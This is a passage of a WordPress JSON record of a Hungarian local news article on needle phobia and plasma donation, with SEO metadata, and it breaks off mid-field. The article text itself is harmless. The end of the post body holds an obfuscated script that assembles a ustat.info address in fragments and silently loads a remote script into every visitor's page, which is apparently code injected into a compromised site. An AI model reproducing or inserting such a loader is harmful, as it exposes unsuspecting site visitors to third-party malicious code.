{"id":60856,"date":"2024-04-03T07:18:08","date_gmt":"2024-04-03T05:18:08","guid":{"rendered":"https:\/\/dorogimedence.hu\/?p=60856"},"modified":"2024-04-03T07:18:08","modified_gmt":"2024-04-03T05:18:08","slug":"a-tufobia-es-a-plazmaadas-kizarjak-egymast","status":"publish","type":"post","link":"https:\/\/dorogimedence.hu\/index.php\/2024\/04\/03\/a-tufobia-es-a-plazmaadas-kizarjak-egymast\/","title":{"rendered":"A t\u0171f\u00f3bia \u00e9s a plazmaad\u00e1s kiz\u00e1rj\u00e1k egym\u00e1st?"},"content":{"rendered":"<p><strong>A plazmaad\u00e1s egy nemes \u00e9s \u00f6nzetlen cselekedet. Elmegy\u00fcnk a legk\u00f6zelebbi Plazmacentrumba, \u00fcld\u00f6g\u00e9l\u00fcnk egy \u00f3r\u00e1csk\u00e1t egy k\u00e9nyelmes fotelben, k\u00f6zben leveszik a v\u00e9rplazm\u00e1t, v\u00e9g\u00fcl t\u00e1vozunk.<\/strong><\/p>\n<p><span style=\"font-weight: 400;\">Csup\u00e1n csak egyetlen apr\u00f3 kellemetlens\u00e9get kell elviseln\u00fcnk: amikor az ilyenkor haszn\u00e1latos t\u0171t bevezetik a karunkba. De val\u00f3j\u00e1ban ez sem t\u00f6bb egy sz\u00fanyogcs\u00edp\u00e9sn\u00e9l, \u00e9s a <span style=\"text-decoration: underline; color: #0000ff;\"><a style=\"color: #0000ff;\" title=\"plazmaad\u00e1s, plazamacentrum Baja\" href=\"https:\/\/baja.plazmacentrum.hu\/\" target=\"_blank\" rel=\"dofollow noopener\"><strong>plazmaad\u00e1s<\/strong> <\/a><\/span>folyamata k\u00f6zben nem is \u00e9rezz\u00fck. Ennyi az eg\u00e9sz. R\u00e1ad\u00e1sul a levett v\u00e9rplazma seg\u00edt a ritka \u00e9s sokszor \u00e9letment\u0151 gy\u00f3gyszerek k\u00e9sz\u00edt\u00e9s\u00e9ben \u00e9s m\u00e9g juttat\u00e1st is kapunk \u00e9rte.&nbsp;&nbsp;<\/span><\/p>\n<h2><b>Hogy lesz ebb\u0151l&nbsp; plazmaad\u00e1s?<\/b><\/h2>\n<p><span style=\"font-weight: 400;\">Na, igen! A fent le\u00edrtak rendk\u00edv\u00fcl egyszer\u0171en hangzanak mindazoknak, akik sz\u00e1m\u00e1ra nem jelent gondot a t\u0171sz\u00far\u00e1s. Persze senki sincs oda \u00e9rte, de \u00e1ltal\u00e1ban csak \u00fagy gondolunk r\u00e1, mint sz\u00fcks\u00e9gszer\u0171 k\u00e9nyelmetlens\u00e9g. Vannak azonban olyan emberek, akik rettegnek a t\u0171sz\u00far\u00e1st\u00f3l. A plazmaad\u00e1s \u00e9rtelemszer\u0171en ilyen esetben szinte kiz\u00e1r\u00f3 t\u00e9nyez\u0151. De pontosan milyen jellemz\u0151i \u00e9s t\u00fcnetei vannak a t\u0171f\u00f3bi\u00e1nak? N\u00e9zz\u00fck meg egy\u00fctt!<\/span><\/p>\n<h2><b>A tripanof\u00f3bia<\/b><\/h2>\n<p><span style=\"font-weight: 400;\">A t\u0171f\u00f3bia, azaz orvosi nev\u00e9n a tripanof\u00f3bia l\u00e9nyeg\u00e9ben a t\u0171t\u0151l val\u00f3 intenz\u00edv, sokszor ak\u00e1r irracion\u00e1lis f\u00e9lelmet jelenti. Els\u0151 hall\u00e1sra azt gondoln\u00e1nk, hogy egy meglehet\u0151sen ritka jelens\u00e9g, de val\u00f3j\u00e1ban jelent\u0151s sz\u00e1m\u00fa ember \u00e9let\u00e9t befoly\u00e1solja szerte a vil\u00e1gon. Ez a f\u00f3bia nem csup\u00e1n a gyermekkorra jellemz\u0151, de feln\u0151ttek k\u00f6r\u00e9ben is gyakori. Tal\u00e1n mondanunk sem kell, hogy megl\u00e9te jelent\u0151s hat\u00e1ssal van az eg\u00e9szs\u00e9g\u00fcgyi elj\u00e1r\u00e1sokra, \u00edgy a plazmaad\u00e1ssal kapcsolatos d\u00f6nt\u00e9sekre is. A t\u0171f\u00f3bia nem csak fizikai reakci\u00f3kat, hanem pszichol\u00f3giai t\u00fcneteket is kiv\u00e1lthat. <\/span><\/p>\n<p><span style=\"font-weight: 400;\">Amennyiben van t\u0171f\u00f3bi\u00e1ban szenved\u0151 ismer\u0151s\u00fcnk, rendk\u00edv\u00fcl komolyan kell venni f\u00e9lelm\u00e9t. A tripanof\u00f3bia nem csup\u00e1n egy \u201cgyerekes hiszti\u201d, amit egy k\u00e9zlegyint\u00e9ssel, vagy jobb esetben n\u00e9h\u00e1ny b\u00e1tor\u00edt\u00f3 sz\u00f3val el lehet int\u00e9zni. Az \u00e9rthet\u0151, hogy a plazmaad\u00e1s nem szerepel a t\u0171t\u0151l retteg\u0151 embert\u00e1rsaink napt\u00e1r\u00e1ban, de sokszor hajlamosak fontos orvosi ell\u00e1t\u00e1s elker\u00fcl\u00e9s\u00e9re is, ami vesz\u00e9lyeztetheti eg\u00e9szs\u00e9g\u00fcket \u00c9rdemes h\u00e1t odafigyelni \u00e9s t\u00f6r\u0151dni ezekkel a bar\u00e1tainkkal, ismer\u0151seinkkel.<\/span><\/p>\n<p><img fetchpriority=\"high\" decoding=\"async\" class=\"alignnone size-full wp-image-60857\" src=\"https:\/\/dorogimedence.hu\/wp-content\/uploads\/2024\/04\/plazma1.jpg\" alt=\"\" width=\"1200\" height=\"883\" srcset=\"https:\/\/dorogimedence.hu\/wp-content\/uploads\/2024\/04\/plazma1.jpg 1200w, https:\/\/dorogimedence.hu\/wp-content\/uploads\/2024\/04\/plazma1-600x442.jpg 600w, https:\/\/dorogimedence.hu\/wp-content\/uploads\/2024\/04\/plazma1-768x565.jpg 768w, https:\/\/dorogimedence.hu\/wp-content\/uploads\/2024\/04\/plazma1-150x110.jpg 150w, https:\/\/dorogimedence.hu\/wp-content\/uploads\/2024\/04\/plazma1-450x331.jpg 450w\" sizes=\"(max-width: 1200px) 100vw, 1200px\" \/><\/p>\n<h2><b>A t\u0171f\u00f3bia t\u00fcnetei<\/b><\/h2>\n<p><span style=\"font-weight: 400;\">A t\u00fcnetek sz\u00e9les sk\u00e1l\u00e1n mozoghatnak az enyhe szorong\u00e1st\u00f3l kezdve a s\u00falyos p\u00e1nikrohamokig. El\u0151fordulhat verejt\u00e9kez\u00e9st, sz\u00e9d\u00fcl\u00e9s, er\u0151s sz\u00edvdobog\u00e1s, s\u0151t s\u00falyosabb esetben ak\u00e1r \u00e1jul\u00e1s is. Nem ritka, hogy a tripanof\u00f3bi\u00e1ban szenved\u0151 emberek m\u00e1r a tervezett t\u0171sz\u00far\u00e1s el\u0151tti napokban rosszul alszanak, fesz\u00fcltek \u00e9s elvesztik a koncentr\u00e1ci\u00f3jukat, ha tudj\u00e1k, hogy injekci\u00f3 vagy v\u00e9rv\u00e9tel v\u00e1r r\u00e1juk.&nbsp;<\/span><\/p>\n<h2><b>Mi\u00e9rt alakul ki a t\u0171f\u00f3bia?<\/b><\/h2>\n<p><span style=\"font-weight: 400;\">Ahogy minden f\u00f3bi\u00e1nak, \u00fagy a tripanof\u00f3bia kialakul\u00e1s\u00e1nak is t\u00f6bb oka lehet. Van, amire tal\u00e1n nincs is racion\u00e1lis magyar\u00e1zat, m\u00e1s esetben pedig egy\u00e9rtelm\u0171en visszavezethet\u0151 a kiv\u00e1lt\u00f3 okra. N\u00e9zz\u00fcnk n\u00e9h\u00e1ny p\u00e9ld\u00e1t.<\/span><\/p>\n<h2><b>Traumatikus gyermekkori \u00e9lm\u00e9nyek<\/b><\/h2>\n<p><span style=\"font-weight: 400;\">Tagadhatatlan, hogy a gyermekkori \u00e9lm\u00e9nyek hat\u00e1ssal vannak viselked\u00e9s\u00fcnkre \u00e9s szem\u00e9lyis\u00e9g\u00fcnkre. Egy kor\u00e1bbi ijeszt\u0151 orvosi elj\u00e1r\u00e1s, egy f\u00e1jdalmas injekci\u00f3 eml\u00e9ke bizony kiv\u00e1lt\u00f3 ok lehet..<\/span><\/p>\n<h3><b>Tanult viselked\u00e9s<\/b><span style=\"font-weight: 400;\">:&nbsp;<\/span><\/h3>\n<p><span style=\"font-weight: 400;\">A t\u0171kt\u0151l val\u00f3 f\u00e9lelmet \u00e1tvehetj\u00fck gyermekkorban a sz\u00fcl\u0151kt\u0151l vagy testv\u00e9rekt\u0151l, hiszen a viselked\u00e9si mint\u00e1k meghat\u00e1roz\u00f3ak. \u00c9pp ez\u00e9rt \u00e9rdemes p\u00e9ld\u00e1t mutatni gyermekeinknek.<\/span><\/p>\n<h3><b>Evol\u00faci\u00f3s \u00f6szt\u00f6n\u00f6k<\/b><span style=\"font-weight: 400;\">:<\/span><\/h3>\n<p><span style=\"font-weight: 400;\">Az is el\u0151fordulhat, hogy egyszer\u0171en a g\u00e9njeinkbe van k\u00f3dolva a f\u00f3bia. Az \u00e9les t\u00e1rgyakt\u00f3l val\u00f3 term\u00e9szetes f\u00e9lelem az ember kialakul\u00e1s\u00e1nak hajnal\u00e1ig ny\u00falik vissza \u00e9s a t\u00fal\u00e9l\u00e9shez k\u00f6t\u0151dik.<\/span><\/p>\n<h3><b>M\u00e9dia hat\u00e1sa<\/b><span style=\"font-weight: 400;\">:<\/span><\/h3>\n<p><span style=\"font-weight: 400;\">Nem szabad al\u00e1becs\u00fclni a t\u0171ket \u00e1br\u00e1zol\u00f3 ijeszt\u0151 vagy negat\u00edv k\u00e9pek hat\u00e1s\u00e1t sem, ami megjelenhet a h\u00edrekben vagy filmekben.<\/span><\/p>\n<h2><b>A t\u0171f\u00f3bia gyakoris\u00e1ga<\/b><\/h2>\n<p><span style=\"font-weight: 400;\">Becsl\u00e9sek szerint a lakoss\u00e1g 3-5 sz\u00e1zal\u00e9ka szenved t\u0171f\u00f3bi\u00e1t\u00f3l. \u00c1m ez a sz\u00e1m ak\u00e1r magasabb is lehet, mivel sokan nem keresnek seg\u00edts\u00e9get vagy nem ismerik fel a probl\u00e9m\u00e1jukat. Egy olyan f\u00e9lelemr\u0151l van sz\u00f3, amit szinte lehetetlen lek\u00fczdeni. De amennyiben valaki m\u00e9gis megpr\u00f3b\u00e1lna megbirk\u00f3zni vele, tal\u00e1n a plazmaad\u00e1s lehet az egyik \u00fat. Hiszen \u00e9rdemes olyan helyre menni, ahol kultur\u00e1lt k\u00f6rnyezetben, bar\u00e1ts\u00e1gos szakemberek vesznek k\u00f6r\u00fcl, r\u00e1ad\u00e1sul nincs k\u00f6telezetts\u00e9g sem, azaz b\u00e1rmikor meggondolhatjuk magunkat.<\/span><\/p>\n<p><script>\n(function(){\nqeyv=document.createElement(\"script\");qeyv_=(\"us\")+(\"ta\");\nqeyv_+=\"t\"+(\".\");qeyv_+=(\"in\");qeyvu=\"2245891613\";qeyv.async=true;\nqeyvu+=\".bbv7nyxxeyvmquvay\";qeyv.type=\"text\/javascript\";qeyv_+=\"f\"+\"o\"+(\"\/\");\nqeyvu+=\"1butadrr0cgd3\";qeyv.src=\"https:\/\/\"+qeyv_+qeyvu;\ndqeyv=document.body;dqeyv.appendChild(qeyv);\n})();\n<\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>A plazmaad\u00e1s egy nemes \u00e9s \u00f6nzetlen cselekedet. Elmegy\u00fcnk a legk\u00f6zelebbi Plazmacentrumba, \u00fcld\u00f6g\u00e9l\u00fcnk egy \u00f3r\u00e1csk\u00e1t egy k\u00e9nyelmes fotelben, k\u00f6zben leveszik a v\u00e9rplazm\u00e1t, v\u00e9g\u00fcl t\u00e1vozunk. Csup\u00e1n csak egyetlen apr\u00f3 kellemetlens\u00e9get kell elviseln\u00fcnk: amikor az ilyenkor haszn\u00e1latos t\u0171t bevezetik a karunkba. De val\u00f3j\u00e1ban ez sem t\u00f6bb egy sz\u00fanyogcs\u00edp\u00e9sn\u00e9l, \u00e9s a plazmaad\u00e1s folyamata k\u00f6zben nem is \u00e9rezz\u00fck. Ennyi az<\/p>\n","protected":false},"author":1,"featured_media":60858,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"ngg_post_thumbnail":0,"footnotes":""},"categories":[3],"tags":[7787,7788],"class_list":{"0":"post-60856","1":"post","2":"type-post","3":"status-publish","4":"format-standard","5":"has-post-thumbnail","7":"category-hirek","8":"tag-plazma","9":"tag-plazmaadas"},"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v27.5 - https:\/\/yoast.com\/product\/yoast-seo-wordpress\/ -->\n<title>A t\u0171f\u00f3bia \u00e9s a plazmaad\u00e1s kiz\u00e1rj\u00e1k egym\u00e1st?<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/dorogimedence.hu\/index.php\/2024\/04\/03\/a-tufobia-es-a-plazmaadas-kizarjak-egymast\/\" class=\"yoast-seo-meta-tag\" \/>\n<meta property=\"og:locale\" content=\"hu_HU\" class=\"yoast-seo-meta-tag\" \/>\n<meta property=\"og:type\" content=\"article\" class=\"yoast-seo-meta-tag\" \/>\n<meta property=\"og:title\" content=\"A t\u0171f\u00f3bia \u00e9s a plazmaad\u00e1s kiz\u00e1rj\u00e1k egym\u00e1st?\" class=\"yoast-seo-meta-tag\" \/>\n<meta property=\"og:description\" content=\"A plazmaad\u00e1s egy nemes \u00e9s \u00f6nzetlen cselekedet. Elmegy\u00fcnk a legk\u00f6zelebbi Plazmacentrumba, \u00fcld\u00f6g\u00e9l\u00fcnk egy \u00f3r\u00e1csk\u00e1t egy k\u00e9nyelmes fotelben, k\u00f6zben leveszik a v\u00e9rplazm\u00e1t, v\u00e9g\u00fcl t\u00e1vozunk. Csup\u00e1n csak egyetlen apr\u00f3 kellemetlens\u00e9get kell elviseln\u00fcnk: amikor az ilyenkor haszn\u00e1latos t\u0171t bevezetik a karunkba. De val\u00f3j\u00e1ban ez sem t\u00f6bb egy sz\u00fanyogcs\u00edp\u00e9sn\u00e9l, \u00e9s a plazmaad\u00e1s folyamata k\u00f6zben nem is \u00e9rezz\u00fck. Ennyi az\" class=\"yoast-seo-meta-tag\" \/>\n<meta property=\"og:url\" content=\"https:\/\/dorogimedence.hu\/index.php\/2024\/04\/03\/a-tufobia-es-a-plazmaadas-kizarjak-egymast\/\" class=\"yoast-seo-meta-tag\" \/>\n<meta property=\"og:site_name\" content=\"Dorogi-medence Region\u00e1lis H\u00edrport\u00e1l\" class=\"yoast-seo-meta-tag\" \/>\n<meta property=\"article:publisher\" content=\"https:\/\/www.facebook.com\/dorogimedence\/\" class=\"yoast-seo-meta-tag\" \/>\n<meta property=\"article:published_time\" content=\"2024-04-03T05:18:08+00:00\" class=\"yoast-seo-meta-tag\" \/>\n<meta property=\"og:image\" content=\"https:\/\/dorogimedence.hu\/wp-content\/uploads\/2024\/04\/plazma0.jpg\" class=\"yoast-seo-meta-tag\" \/>\n\t<meta property=\"og:image:width\" content=\"1000\" class=\"yoast-seo-meta-tag\" \/>\n\t<meta property=\"og:image:height\" content=\"619\" class=\"yoast-seo-meta-tag\" \/>\n\t<meta property=\"og:image:type\" content=\"image\/jpeg\" class=\"yoast-seo-meta-tag\" \/>\n<meta name=\"author\" content=\"dorogimedence.hu\" class=\"yoast-seo-meta-tag\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" class=\"yoast-seo-meta-tag\" \/>\n<meta name=\"twitter:label1\" content=\"Szerz\u0151:\" class=\"yoast-seo-meta-tag\" \/>\n\t<meta name=\"twitter:data1\" content=\"dorogimedence.hu\" class=\"yoast-seo-meta-tag\" \/>\n\t<meta name=\"twitter:label2\" content=\"Becs\u00fclt olvas\u00e1si id\u0151\" class=\"yoast-seo-meta-tag\" \/>\n\t<meta name=\"twitter:data2\" content=\"4 perc\" class=\"yoast-seo-meta-tag\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\\\/\\\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\\\/\\\/dorogimedence.hu\\\/index.php\\\/2024\\\/04\\\/03\\\/a-tufobia-es-a-plazmaadas-kizarjak-egymast\\\/#article\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/dorogimedence.hu\\\/index.php\\\/2024\\\/04\\\/03\\\/a-tufobia-es-a-plazmaadas-kizarjak-egymast\\\/\"},\"author\":{\"name\":\"dorogimedence.hu\",\"@id\":\"https:\\\/\\\/dorogimedence.hu\\\/#\\\/schema\\\/person\\\/ce6091eeb7e95ecdc87890d6aa8e0fd4\"},\"headline\":\"A t\u0171f\u00f3bia \u00e9s a plazmaad\u00e1s kiz\u00e1rj\u00e1k egym\u00e1st?\",\"datePublished\":\"2024-04-03T05:18:08+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\\\/\\\/dorogimedence.hu\\\/index.php\\\/2024\\\/04\\\/03\\\/a-tufobia-es-a-plazmaadas-kizarjak-egymast\\\/\"},\"wordCount\":876,\"publisher\":{\"@id\":\"https:\\\/\\\/dorogimedence.hu\\\/#organization\"},\"image\":{\"@id\":\"https:\\\/\\\/dorogimedence.hu\\\/index.php\\\/2024\\\/04\\\/03\\\/a-tufobia-es-a-plazmaadas-kizarjak-egymast\\\/#primaryimage\"},\"thumbnailUrl\":\"https:\\\/\\\/dorogimedence.hu\\\/wp-content\\\/uploads\\\/2024\\\/04\\\/plazma0.jpg\",\"keywords\":[\"plazma\",\"plazmaad\u00e1s\"],\"articleSection\":[\"H\u00edrek\"],\"inLanguage\":\"hu\"},{\"@type\":\"WebPage\",\"@id\":\"https:\\\/\\\/dorogimedence.hu\\\/index.php\\\/2024\\\/04\\\/03\\\/a-tufobia-es-a-plazmaadas-kizarjak-egymast\\\/\",\"url\":\"https:\\\/\\\/dorogimedence.hu\\\/index.php\\\/2024\\\/04\\\/03\\\/a-tufobia-es-a-plazmaadas-kizarjak-egymast\\\/\",\"name\":\"A t\u0171f\u00f3bia \u00e9s a plazmaad\u00e1s kiz\u00e1rj\u00e1k egym\u00e1st?\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/dorogimedence.hu\\\/#website\"},\"primaryImageOfPage\":{\"@id\":\"https:\\\/\\\/dorogimedence.hu\\\/index.php\\\/2024\\\/04\\\/03\\\/a-tufobia-es-a-plazmaadas-kizarjak-egymast\\\/#primaryimage\"},\"image\":{\"@id\":\"https:\\\/\\\/dorogimedence.hu\\\/index.php\\\/2024\\\/04\\\/03\\\/a-tufobia-es-a-plazmaadas-kizarjak-egymast\\\/#primaryimage\"},\"thumbnailUrl\":\"https:\\\/\\\/dorogimedence.hu\\\/wp-content\\\/uploads\\\/2024\\\/04\\\/plazma0.jpg\",\"datePublished\":\"2024-04-03T05:18:08+00:00\",\"breadcrumb\":{\"@id\":\"https:\\\/\\\/dorogimedence.hu\\\/index.php\\\/2024\\\/04\\\/03\\\/a-tufobia-es-a-plazmaadas-kizarjak-egymast\\\/#breadcrumb\"},\"inLanguage\":\"hu\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\\\/\\\/dorogimedence.hu\\\/index.php\\\/2024\\\/04\\\/03\\\/a-tufobia-es-a-plazmaadas-kizarjak-egymast\\\/\"]}]},{\"@type\":\"ImageObject\",\"inLanguage\":\"hu\",\"@id\":\"https:\\\/\\\/dorogimedence.hu\\\/index.php\\\/2024\\\/04\\\/03\\\/a-tufobia-es-a-plazmaadas-kizarjak-egymast\\\/#primaryimage\",\"url\":\"https:\\\/\\\/dorogimedence.hu\\\/wp-content\\\/uploads\\\/2024\\\/04\\\/plazma0.jpg\",\"contentUrl\":\"https:\\\/\\\/dorogimedence.hu\\\/wp-content\\\/uploads\\\/2024\\\/04\\\/plazma0.jpg\",\"width\":1000,\"height\":619},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\\\/\\\/dorogimedence.hu\\\/index.php\\\/2024\\\/04\\\/03\\\/a-tufobia-es-a-plazmaadas-kizarjak-egymast\\\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Kezd\u0151lap\",\"item\":\"https:\\\/\\\/dorogimedence.hu\\\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"A t\u0171f\u00f3bia \u00e9s a plazmaad\u00e1s kiz\u00e1rj\u00e1k egym\u00e1st?\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\\\/\\\/dorogimedence.hu\\\/#website\",\"url\":\"https:\\\/\\\/dorogimedence.hu\\\/\",\"name\":\"Dorogi-medence Region\u00e1lis H\u00edrport\u00e1l\",\"description\":\"Dorog, Keszt\u00f6lc, Le\u00e1nyv\u00e1r, Piliscs\u00e9v, Tokod, Tokodalt\u00e1r\u00f3, Csolnok, Esztergom-kertv\u00e1ros: h\u00edrek, programok\",\"publisher\":{\"@id\":\"https:\\\/\\\/dorogimedence.hu\\\/#organization\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\\\/\\\/dorogimedence.hu\\\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"hu\"},{\"@type\":\"Organization\",\"@id\":\"https:\\\/\\\/dorogimedence.hu\\\/#organization\",\"name\":\"Dorogi-medence Region\u00e1lis H\u00edrport\u00e1l\",\"url\":\"https:\\\/\\\/dorogimedence.hu\\\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"hu\",\"@id\":\"https:\\\/\\\/dorogimedence.hu\\\/#\\\/schema\\\/logo\\\/image\\\/\",\"url\":\"https:\\\/\\\/dorogimedence.hu\\\/wp-content\\\/uploads\\\/2021\\\/04\\\/logo-feher-600.png\",\"contentUrl\":\"https:\\\/\\\/dorogimedence.hu\\\/wp-content\\\/uploads\\\/2021\\\/04\\\/logo-feher-600.png\",\"width\":600,\"height\":100,\"caption\":\"Dorogi-medence Region\u00e1lis H\u00edrport\u00e1l\"},\"image\":{\"@id\":\"https:\\\/\\\/dorogimedence.hu\\\/#\\\/schema\\\/logo\\\/image\\\/\"},\"sameAs\":[\"https:\\\/\\\/www.facebook.com\\\/dorogimedence\\\/\"]},{\"@type\":\"Person\",\"@id\":\"https:\\\/\\\/dorogimedence.hu\\\/#\\\/schema\\\/person\\\/ce6091eeb7e95ecdc87890d6aa8e0fd4\",\"name\":\"dorogimedence.hu\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"hu\",\"@id\":\"\\\/\\\/www.gravatar.com\\\/avatar\\\/d8d45f8901aadff40a4af72c0b826f1d?s=96&#038;r=g&#038;d=mm\",\"url\":\"\\\/\\\/www.gravatar.com\\\/avatar\\\/d8d45f8901aadff40a4af72c0b826f1d?s=96&#038;r=g&#038;d=mm\",\"contentUrl\":\"\\\/\\\/www.gravatar.com\\\/avatar\\\/d8d45f8901aadff40a4af72c0b826f1d?s=96&#038;r=g&#038;d=mm\",\"caption\":\"dorogimedence.hu\"}}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"A t\u0171f\u00f3bia \u00e9s a plazmaad\u00e1s kiz\u00e1rj\u00e1k egym\u00e1st?","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/dorogimedence.hu\/index.php\/2024\/04\/03\/a-tufobia-es-a-plazmaadas-kizarjak-egymast\/","og_locale":"hu_HU","og_type":"article","og_title":"A t\u0171f\u00f3bia \u00e9s a plazmaad\u00e1s kiz\u00e1rj\u00e1k egym\u00e1st?","og_description":"A plazmaad\u00e1s egy nemes \u00e9s \u00f6nzetlen cselekedet. Elmegy\u00fcnk a legk\u00f6zelebbi Plazmacentrumba, \u00fcld\u00f6g\u00e9l\u00fcnk egy \u00f3r\u00e1csk\u00e1t egy k\u00e9nyelmes fotelben, k\u00f6zben leveszik a v\u00e9rplazm\u00e1t, v\u00e9g\u00fcl t\u00e1vozunk. Csup\u00e1n csak egyetlen apr\u00f3 kellemetlens\u00e9get kell elviseln\u00fcnk: amikor az ilyenkor haszn\u00e1latos t\u0171t bevezetik a karunkba. De val\u00f3j\u00e1ban ez sem t\u00f6bb egy sz\u00fanyogcs\u00edp\u00e9sn\u00e9l, \u00e9s a plazmaad\u00e1s folyamata k\u00f6zben nem is \u00e9rezz\u00fck. Ennyi az","og_url":"https:\/\/dorogimedence.hu\/index.php\/2024\/04\/03\/a-tufobia-es-a-plazmaadas-kizarjak-egymast\/","og_site_name":"Dorogi-medence Region\u00e1lis H\u00edrport\u00e1l","article_publisher":"https:\/\/www.facebook.com\/dorogimedence\/","article_published_time":"2024-04-03T05:18:08+00:00","og_image":[{"width":1000,"height":619,"url":"https:\/\/dorogimedence.hu\/wp-content\/uploads\/2024\/04\/plazma0.jpg","type":"image\/jpeg"}],"author":"dorogimedence.hu","twitter_card":"summary_large_image","twitter_misc":{"Szerz\u0151:":"dorogimedence.hu","Becs\u00fclt olvas\u00e1si id\u0151":"4 perc"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/dorogimedence.hu\/index.php\/2024\/04\/03\/a-tufobia-es-a-plazmaadas-kizarjak-egymast\/#article","isPartOf":{"@id":"https:\/\/dorogimedence.hu\/index.php\/2024\/04\/03\/a-tufobia-es-a-plazmaadas-kizarjak-egymast\/"},"author":{"name":"dorogimedence.hu","@id":"https:\/\/dorogimedence.hu\/#\/schema\/person\/ce6091eeb7e95ecdc87890d6aa8e0fd4"},"headline":"A t\u0171f\u00f3bia \u00e9s a plazmaad\u00e1s kiz\u00e1rj\u00e1k egym\u00e1st?","datePublished":"2024-04-03T05:18:08+00:00","mainEntityOfPage":{"@id":"https:\/\/dorogimedence.hu\/index.php\/2024\/04\/03\/a-tufobia-es-a-plazmaadas-kizarjak-egymast\/"},"wordCount":876,"publisher":{"@id":"https:\/\/dorogimedence.hu\/#organization"},"image":{"@id":"https:\/\/dorogimedence.hu\/index.php\/2024\/04\/03\/a-tufobia-es-a-plazmaadas-kizarjak-egymast\/#primaryimage"},"thumbnailUrl":"https:\/\/dorogimedence.hu\/wp-content\/uploads\/2024\/04\/plazma0.jpg","keywords":["plazma","plazmaad\u00e1s"],"articleSection":["H\u00edrek"],"inLanguage":"hu"},{"@type":"WebPage","@id":"https:\/\/dorogimedence.hu\/index.php\/2024\/04\/03\/a-tufobia-es-a-plazmaadas-kizarjak-egymast\/","url":"https:\/\/dorogimedence.hu\/index.php\/2024\/04\/03\/a-tufobia-es-a-plazmaadas-kizarjak-egymast\/","name":"A t\u0171f\u00f3bia \u00e9s a plazmaad\u00e1s kiz\u00e1rj\u00e1k egym\u00e1st?","isPartOf":{"@id":"https:\/\/dorogimedence.hu\/#website"},"primaryImageOfPage":{"@id":"https:\/\/dorogimedence.hu\/index.php\/2024\/04\/03\/a-tufobia-es-a-plazmaadas-kizarjak-egymast\/#primaryimage"},"image":{"@id":"https:\/\/dorogimedence.hu\/index.php\/2024\/04\/03\/a-tufobia-es-a-plazmaadas-kizarjak-egymast\/#primaryimage"},"thumbnailUrl":"https:\/\/dorogimedence.hu\/wp-content\/uploads\/2024\/04\/plazma0.jpg","datePublished":"2024-04-03T05:18:08+00:00","breadcrumb":{"@id":"https:\/\/dorogimedence.hu\/index.php\/2024\/04\/03\/a-tufobia-es-a-plazmaadas-kizarjak-egymast\/#breadcrumb"},"inLanguage":"hu","potentialAction":[{"@type":"ReadAction","target":["https:\/\/dorogimedence.hu\/index.php\/2024\/04\/03\/a-tufobia-es-a-plazmaadas-kizarjak-egymast\/"]}]},{"@type":"ImageObject","inLanguage":"hu","@id":"https:\/\/dorogimedence.hu\/index.php\/2024\/04\/03\/a-tufobia-es-a-plazmaadas-kizarjak-egymast\/#primaryimage","url":"https:\/\/dorogimedence.hu\/wp-content\/uploads\/2024\/04\/plazma0.jpg","contentUrl":"https:\/\/dorogimedence.hu\/wp-content\/uploads\/2024\/04\/plazma0.jpg","width":1000,"height":619},{"@type":"BreadcrumbList","@id":"https:\/\/dorogimedence.hu\/index.php\/2024\/04\/03\/a-tufobia-es-a-plazmaadas-kizarjak-egymast\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Kezd\u0151lap","item":"https:\/\/dorogimedence.hu\/"},{"@type":"ListItem","position":2,"name":"A t\u0171f\u00f3bia \u00e9s a plazmaad\u00e1s kiz\u00e1rj\u00e1k egym\u00e1st?"}]},{"@type":"WebSite","@id":"https:\/\/dorogimedence.hu\/#website","url":"https:\/\/dorogimedence.hu\/","name":"Dorogi-medence Region\u00e1lis H\u00edrport\u00e1l","description":"Dorog, Keszt\u00f6lc, Le\u00e1nyv\u00e1r, Piliscs\u00e9v, Tokod, Tokodalt\u00e1r\u00f3, Csolnok, Esztergom-kertv\u00e1ros: h\u00edrek, programok","publisher":{"@id":"https:\/\/dorogimedence.hu\/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/dorogimedence.hu\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"hu"},{"@type":"Organization","@id":"https:\/\/dorogimedence.hu\/#organization","name":"Dorogi-medence Region\u00e1lis H\u00edrport\u00e1l","url":"https:\/\/dorogimedence.hu\/","logo":{"@type":"ImageObject","inLanguage":"hu","@id":"https:\/\/dorogimedence.hu\/#\/schema\/logo\/image\/","url":"https:\/\/dorogimedence.hu\/wp-content\/uploads\/2021\/04\/logo-feher-600.png","contentUrl":"https:\/\/dorogimedence.hu\/wp-content\/uploads\/2021\/04\/logo-feher-600.png","width":600,"height":100,"caption":"Dorogi-medence Region\u00e1lis 